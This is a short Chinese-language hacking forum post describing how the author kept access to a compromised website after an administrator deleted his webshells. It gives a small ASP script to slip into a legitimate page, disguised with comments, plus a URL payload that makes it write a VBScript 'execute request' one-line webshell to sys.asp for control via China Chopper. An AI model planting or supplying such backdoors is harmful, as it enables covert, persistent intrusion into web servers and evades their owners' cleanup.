主题：另类一句话插入技巧
Author：Roker
内容：今天搞渗透的时候，没想到管理员在，上传的shell全被他删了

一句话木马也不放过
无奈写下了下面的脚本

<%
id =request("id")
if id <> "" then 
set fso=Server.CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(server.mappath("sys.asp"),8,true)
.Writeline id
.close
End with
End if
%>                            /*不会被杀，很正常的代码。不需要加密。 

再加一些注释迷惑管理员，
插入到正常asp文件
这样只要我一访问 aspname.asp?id=<SCRIPT language=VBScript runat="server">execute request("123")</SCRIPT> 
就会在 根目录下 生成 sys.asp一句话
菜刀连之，成功